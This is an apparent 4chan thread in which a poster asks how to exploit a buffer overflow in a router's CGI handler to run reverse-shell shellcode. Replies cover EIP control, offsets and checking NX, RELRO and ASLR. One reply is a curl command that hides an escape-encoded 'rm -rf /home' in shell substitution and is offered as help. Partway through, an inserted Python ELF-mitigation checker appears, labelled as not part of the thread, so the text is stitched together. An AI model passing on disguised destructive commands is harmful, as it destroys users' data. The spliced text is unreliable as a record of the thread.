Hacker wizards of 4chan, I need some help. Long story short, I found a buffer overflow vulnerability on a router; it's in the CGI file and accessible via an HTTP GET parameter. How do I exploit this? How do I take this from the strcpy libc function to the reverse shell shellcode I pulled off of Metasploit? That's the one part I never understood: going from found vulnerability to writing the exploit. I have the shellcode, I have the vulnerability, but what do I do between the two? What are the steps? Thank you.
>>107829266
>via an http get parameter
why don't you just say GET request? methinks ur a skid
>>107829275
Fine, I'm a script kitty, whatever. Can you help me?
>>107829275
not OP, but parameter is more specific, that's why. with you being gay, that's why a close 2
>>107829266
just flow over that buffer bro
>>107829266
you can't 'find' a vuln without knowing how to exploit it, unless you used some automated software. Think of it: if I know that this lock is vuln to the fact that the latch inside is made of steel, you know that to exploit it you need a strong magnet; if it's vuln to voltage, you short circuit something, and so on.
>>107829266
excuse me, but this is not a distro war thread. please delete it
>>107829391
I found the vuln with IDA Pro and traced it back to the param via the strcpy. I emulated the file system and Linux kernel with QEMU, ran the HTTP server, passed a param with a CGI environment variable, and I see my 'a' chars in hex in the segfault core file with GDB in the various registers. I know it's vulnerable.
Crashing isn't the same as vulnerable. You need it to overflow the return/jump address with data that points to another overflowed address that contains instructions.
>>107829460
Is there a generic shellcode that does this? Do I have to determine the address by finding it with GDB or something? Wouldn't it be randomized each time because of ASLR?
>>107829433
well, if you can control the EIP and calc the offset, then you can basically do whatever tf you want, assuming no limits on data injection or char restriction. use this tool https://slimm609.github.io/checksec/ to see what kinda mitigations are in place, then proceed. NX is non-executable, RELRO is read-only, ASLR is randomized memory, among many; so check first if you can execute the code or not
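What that checksec step actually reads out of a binary, as an added example that is not from the thread and not the checksec project's code: a small header-only checker for NX, RELRO and PIE that handles ELF32/ELF64 in either byte order (so it works on MIPS/ARM router binaries as well as x86), plus a constructed header-only ELF builder used purely as test input. Canary and full-RELRO detection need the symbol and dynamic tables and are left out on purpose.

```python
import struct

PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552   # GNU program-header types
PF_X, ET_DYN = 0x1, 3                                   # executable flag, position-independent type

def elf_mitigations(data: bytes) -> dict:
    """Report NX / RELRO / PIE from the ELF program headers alone (ELF32 or ELF64,
    little- or big-endian). Stack canaries and full RELRO need the symbol and
    dynamic tables and are deliberately not checked here."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    end = "<" if data[5] == 1 else ">"          # EI_DATA: 1 = little-endian, 2 = big-endian
    e_type, = struct.unpack_from(end + "H", data, 16)
    if data[4] == 2:                            # EI_CLASS 2 = ELF64
        phoff, = struct.unpack_from(end + "Q", data, 32)
        phentsize, phnum = struct.unpack_from(end + "HH", data, 54)
        ph_fmt, flags_idx = end + "IIQQQQQQ", 1   # p_flags is the 2nd field in Elf64_Phdr
    else:                                       # ELF32
        phoff, = struct.unpack_from(end + "I", data, 28)
        phentsize, phnum = struct.unpack_from(end + "HH", data, 42)
        ph_fmt, flags_idx = end + "IIIIIIII", 6   # p_flags is the 7th field in Elf32_Phdr
    stack_flags, relro = None, False
    for i in range(phnum):
        ph = struct.unpack_from(ph_fmt, data, phoff + i * phentsize)
        if ph[0] == PT_GNU_STACK:
            stack_flags = ph[flags_idx]
        elif ph[0] == PT_GNU_RELRO:
            relro = True
    return {
        # no PT_GNU_STACK at all means the loader gives an executable stack
        "nx": stack_flags is not None and not (stack_flags & PF_X),
        "relro": "partial" if relro else "none",   # "full" would also need DT_BIND_NOW
        "pie": e_type == ET_DYN,
    }

def build_elf(is64=True, big_endian=False, pie=False, nx=True, relro=False) -> bytes:
    """Constructed test input: a header-only ELF with no code, just the phdrs that matter."""
    end = ">" if big_endian else "<"
    phdrs = [(PT_GNU_STACK, 0x6 | (0 if nx else PF_X))] + ([(PT_GNU_RELRO, 0x4)] if relro else [])
    ident = b"\x7fELF" + bytes([2 if is64 else 1, 2 if big_endian else 1, 1]) + bytes(9)
    if is64:
        hdr = struct.pack(end + "16sHHIQQQIHHHHHH", ident, ET_DYN if pie else 2, 0, 1,
                          0, 64, 0, 0, 64, 56, len(phdrs), 0, 0, 0)
        body = b"".join(struct.pack(end + "IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    else:
        hdr = struct.pack(end + "16sHHIIIIIHHHHHH", ident, ET_DYN if pie else 2, 0, 1,
                          0, 52, 0, 0, 52, 32, len(phdrs), 0, 0, 0)
        body = b"".join(struct.pack(end + "IIIIIIII", t, 0, 0, 0, 0, 0, f, 0) for t, f in phdrs)
    return hdr + body
```

On a real file, `elf_mitigations(open(path, "rb").read())` gives the same three answers; an old embedded build that comes back `nx: False, relro: "none", pie: False` is the case the post above is warning you to check for first.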
>>107829266
curl "http://router/cgi?par=`$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65' 'run_shell'`"
>>107829516
What do you mean generic? You can't just run any app to magically tell you the address; you need to overflow with a payload and then make the pointer jump to it. None of that is automatic; you need to debug every step before the crash to see how the code behaves.
>>107829594
wth i ran this and my router grew legs and started stomping me